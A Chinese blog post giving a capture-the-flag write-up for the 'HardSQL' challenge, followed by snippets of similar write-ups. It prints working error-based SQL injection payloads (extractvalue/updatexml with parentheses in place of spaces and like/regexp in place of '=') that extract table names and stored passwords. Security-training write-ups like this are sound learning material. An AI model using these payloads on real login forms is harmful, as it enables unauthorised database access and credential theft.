[极客大挑战 2019]HardSQL

最新推荐文章于 2024-05-04 17:16:12 发布
最新推荐文章于 2024-05-04 17:16:12 发布
阅读量99 收藏
点赞数
文章标签: sql 数据库 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/stantic/article/details/124977642
版权

 fuzz了一下,还是有很多没有过滤的

 加了一个',发现报错,是单引号注入,这里fuzz中发现空格被过滤了,还有%0a之类的也被过滤了,这里学到了一个用()来代替空格,在需要空格的那个地方使用()来包裹

/check.php?username=admin&password=admin'or(extractvalue(1,concat(0x7e,(select(database())))))%23

因为=也被过滤了,所以可以用like或着regexp来匹配table.schema之类的后面的字符

/check.php?username=admin&password=admin'or(extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where((table_schema)regexp('geek'))))))%23 

/check.php?username=admin&password=admin'or(extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where((table_name)like('H4rDsq1'))))))%23 

/check.php?username=admin&password=admin'or(extractvalue(1,concat(0x7e,(select(username)from(geek.H4rDsq1)))))%23 

看username没有东西,再看password,flag出来了,但是没有完全出来,那就用right来看右边的字符

 

check.php?username=admin&password=admin'or(extractvalue(1,concat(0x7e,(select(right(password,20))from(geek.H4rDsq1)))))%23

/check.php?username=admin&password=admin'or(extractvalue(1,concat(0x7e,(select(password)from(geek.H4rDsq1)))))%23 

flag{ea07dc64-553d-4b4f-bfc1-7de791bb3e33}

做sql注入,感觉要提高效率,要多用fuzz来看,以及对一些比如空格的替换要多学几个才行。

stantic
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[极客挑战 2019]HardSQL -wp
freerats的博客
07-04 670
直接找注入,随便填写用户名密码,用户名处多加个引号,有报错 加个or 1 # 有过滤,抓个包fuzz一下 等号,空格等被过滤 发现可以用报错注入,空格可以用括号代替 username=admin'or(extractvalue(1,concat('0x7e',version())))%23 username=admin'or(extractvalue(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table
[极客挑战 2019] web题-HardSQL
BROTHERYY的博客
07-13 352
复现环境:buuoj.cn union被过滤了 ,会被他抓住,使用updatexml 得到表名 得到字段查询username和password 查询密码发现不能显示完全 使用left和right进行查询 left=flag{2b77bf01-867e-4b28-a801-0 right=4-be1d-4be4-bc1b-24069dfe9222} 拼凑得到flag flag{2b77bf01-867e-4b28-a801-04-be1d-4be4-bc1b-24069dfe9222} ...
极客挑战 Hardsql
weixin_45751765的博客
08-30 576
0x00 前言 a.sql注入fuzzing 碰到sql注入题时,为尽快确认过滤列,可做一个fuzzing_test 注意一次发太多包会429,适当调节引擎 可以看到736都是被过滤的
[极客挑战 2019]HardSQL 1
最新发布
qq_44724114的博客
05-04 494
右键选择send to intruder——选择爆破点(这里我只选了password为爆破点)选择已经准备好的字典,下面的字典不全,但也勉强能用。我这里Length 如果是784的就不能跑 799的可以;具体的可以看Response的提示来判断。
[BUUCTF刷题]HardSQL
weixin_43952190的博客
07-03 2019
HardSQL 进入后是sql注入页面,过滤了一些字符,先进行fuzz测试。 发现过滤了union,双写也无法绕过,所以不能使用常规的方法进行注入。但发现没有过滤extractvalue和updatexml。 也过滤了空格,使用括号绕过。 首先,注数据库名称 username=admin'or(updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1))%23&password=1 然后得到表名(过滤=,使用like) userna
[极客挑战 2019]HardSQL详细解析
sinat_61654365的博客
02-19 529
抓包看看都过滤了些什么?长度为784的为过滤字段,过滤了很多,例如空格,sleep,insert,--+,<>,and,等于号,by,union,/**/等等在测试引号的时候存在报错,有关函数updatexml()和extractvalue()所以尝试报错注入并且过滤了空格使用()闭合子查询绕过括号是用来包围子查询的。因此,任何可以计算出结果的语句,都可以用括号包围起来。本文使用updatexml()
buuctf-[极客挑战 2019]HardSQL(小宇特详解)
小宇的web博客
01-26 3009
buuctf-[极客挑战 2019]HardSQL(小宇特详解) 遇到了SQL注入,先尝试一下万能密码,虽然感觉%100不能用 果不其然 双写再试一下发现也不行 这里使用extractvalue和updatexml进行报错注入,空格和=号没有,所以我们要使用()来代替空格,使用like来代替=号 使用extractvalue() /check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(database
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
此文档描述的是2019年三诺集团四周年庆典的一项独特活动——“极客摇滚跑”。这是一场集科技、运动和音乐于一体的大型庆典,旨在庆祝三诺集团的周年纪念,并促进北海市高新产业园及其相关企业的交流与合作。活动的...
天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
01-28
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,...天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
ISCC2019个人挑战赛题目练习
05-05
【ISCC2019个人挑战赛题目练习】是一次针对网络安全技术的竞赛,旨在提升参赛者在信息安全领域的技能和实战经验。此类挑战通常涵盖多种技术领域,包括但不限于密码学、漏洞分析、网络嗅探、逆向工程、Web安全以及...
极客学院JAVA视频教程 新版 7大部分
08-08
Java语言视频教程 极客学院JAVA视频教程 新版 7大部分
python极客项目编程pdf
03-31
python极客项目编程书籍,很好的一本深入学习python的书籍
极客web前端
07-22
教程名称:极客web前端教程目录:【】1、走进前端工程师的世界【】2、HTML5【】3、CSS3【】4、Javascript【】5、常?的库之 jQuery【】6、常?...资源太大,传百度网盘了,链接在附件中,有需要的同学自取。
GFG-:极客极客30天挑战
02-17
极客30天挑战2021年1月 30天练​​习问题的Python解决方案: 与同学一起翻阅怪胎。(Array); 第N个自然数; 不能表示为Sum的最小正整数; 从抽屉里拿出“ k”双袜子的最小采摘次数; 螺旋矩阵奇克兰的硬币; 有效...
buuctf 极客挑战 hardsql
SopRomeo的博客
01-19 3899
常规sql注入发现成这样了。 然后发现order by 和 union 都不行 报错注入就可以用了 可以使用extractvalue和updatexml进行报错注入 附上视频讲解https://www.bilibili.com/video/av77851975 输入的时候发现了 这题目还过滤了空格和and emmmm 用括号来代替空格就能绕过了 发现还不行 百度了web 的骚操作 用’^'来连接...
非常经典的一道SQL报错注入题目[极客挑战 2019]HardSQL 1(两种解法!)
m0_73734159的博客
11-16 1414
(在使用语句时,如果XPath_string不符合该种类格式,就会出现格式错误,并且会以系统报错的形式提示出错误!(局限性查询字符串长度最大为32位,要突破此限制可使用right(),left(),substr()来截取字符串)没错,又是我,这群该死的黑客竟然如此厉害,所以我回去爆肝SQL注入,这次,再也没有人能拿到我的flag了。那么下面就给大家一直演示^绕过or限制了(上一个updatexml()函数使用的是()绕过空格限制)函数exp() 此函数返回e(自然对数的底)指数X的幂值的函数。
极客挑战 2019]EasySQL
09-03
EasySQL极客挑战 2019 中的一个题目,它是一个简单的 SQL 数据库查询题目。可以通过编写 SQL 查询语句来实现对给定的数据库表进行数据查询和分析。 在 EasySQL 中,你将面对一个包含不同表的数据库,你需要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值